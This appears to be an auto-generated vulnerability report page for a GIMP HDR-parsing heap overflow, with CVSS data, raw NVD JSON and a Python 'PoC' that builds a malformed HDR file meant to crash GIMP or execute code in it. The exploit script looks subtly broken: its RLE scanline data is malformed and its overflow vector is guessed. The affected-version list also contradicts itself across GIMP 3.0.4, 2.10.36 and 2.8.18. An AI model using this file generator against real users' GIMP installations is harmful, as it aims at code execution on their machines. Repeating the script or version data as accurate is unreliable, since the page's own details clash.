Security Vulnerability Report

CVE-2025-10921 (CVSS 7.8 HIGH)

Published: 2025-10-29 20:15:35
Last Modified: 2025-11-04 17:08:46

Description

GIMP HDR File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of HDR files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27803.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:gimp:gimp:3.0.4:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:* - VULNERABLE
GIMP < 2.10.36
GIMP (GEGL library) < 0.4.48
Debian LTS (stretch) < 2.8.18-1+deb9u5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-10921 PoC - GIMP HDR Heap Buffer Overflow
# Generate malicious HDR file to trigger heap-based buffer overflow
# This PoC creates a crafted HDR file with oversized data in specific fields
import struct
import os


def create_malicious_hdr(output_path):
    """
    Create a malicious HDR file to trigger buffer overflow in GIMP HDR parser.
    The vulnerability exists when parsing RGBE format HDR files where
    insufficient length validation leads to heap buffer overflow.
    """
    # HDR file header
    header = b'#?RADIANCE\n'

    # Craft resolution line with oversized data
    # Normal format: -Y 1024 +X 1024
    # We inject extra data to trigger overflow in buffer handling
    resolution = b'-Y 2048 +X 2048\n'

    # Create malformed exposure/comment section
    # This section will contain oversized data to overflow heap buffer
    comment_size = 10000  # Oversized to trigger overflow
    malicious_comment = b'EXPOSURE=1.0\n'
    malicious_comment += b'COMMENT=' + b'A' * comment_size + b'\n'

    # HDR commands section - inject overflow data
    commands = b'FORMAT=32-bit_rle_rgbe\n'
    commands += b'\n'

    # Generate RGBE data - normal HDR scanlines
    # Each scanline: 4 bytes per pixel (R,G,B,E)
    width = 2048
    height = 2048
    rgbe_data = bytearray()
    for y in range(height):
        # Scanline start marker for RLE encoding
        rgbe_data += struct.pack('BBBB', 2, 2, (width >> 8) & 0xFF, width & 0xFF)
        # Create scanline data with RGBE format
        # RLE compressed scanline
        scanline = bytearray()
        for x in range(width):
            # RGBE format: 1 byte exponent, 3 bytes mantissa
            r = 128  # Red channel
            g = 128  # Green channel
            b = 128  # Blue channel
            e = 128  # Exponent
            scanline += bytes([r, g, b, e])
        rgbe_data += bytes(scanline)

    # Write the malicious HDR file
    with open(output_path, 'wb') as f:
        f.write(header)
        f.write(resolution)
        f.write(malicious_comment)
        f.write(commands)
        f.write(rgbe_data)

    print(f"[+] Malicious HDR file created: {output_path}")
    print(f"[+] File size: {os.path.getsize(output_path)} bytes")
    print(f"[+] Comment section size: {len(malicious_comment)} bytes")


def verify_hdr_structure(file_path):
    """Verify the generated HDR file structure"""
    with open(file_path, 'rb') as f:
        content = f.read(100)
    print(f"[+] File header: {content[:50]}")
    if b'RADIANCE' in content:
        print("[+] Valid HDR header detected")


if __name__ == '__main__':
    output_file = 'CVE-2025-10921_poc.hdr'
    print("=" * 60)
    print("CVE-2025-10921 GIMP HDR Heap Buffer Overflow PoC")
    print("=" * 60)
    create_malicious_hdr(output_file)
    verify_hdr_structure(output_file)
    print("\n[!] Usage: Open the generated .hdr file with vulnerable GIMP version")
    print("[!] This will trigger heap-based buffer overflow for code execution")
```

References

https://gitlab.gnome.org/GNOME/gegl/-/commit/0e68b7471dabf2800d780819c19bd5e6462f565f - Patch
https://www.zerodayinitiative.com/advisories/ZDI-25-910/ - Third Party Advisory
https://lists.debian.org/debian-lts-announce/2025/10/msg00021.html - Mailing List

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-10921",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-29T20:15:34.797",
    "lastModified": "2025-11-04T17:08:46.460",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "GIMP HDR File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of HDR files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27803."
      }
    ],
    "metrics": {
      "cvssMetricV30": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.0",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-122"}]
      },
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-787"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:gimp:gimp:3.0.4:*:*:*:*:*:*:*",
                "matchCriteriaId": "103D75C8-35B7-4E50-B75C-2D75294CB7AC"
              }
            ]
          }
        ]
      },
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://gitlab.gnome.org/GNOME/gegl/-/commit/0e68b7471dabf2800d780819c19bd5e6462f565f",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://www.zerodayinitiative.com/advisories/ZDI-25-910/",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      },
      {
        "url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00021.html",
        "source": "af854a3a-2127-422b-91ae-364da2661108",
        "tags": ["Mailing List"]
      }
    ]
  }
}
```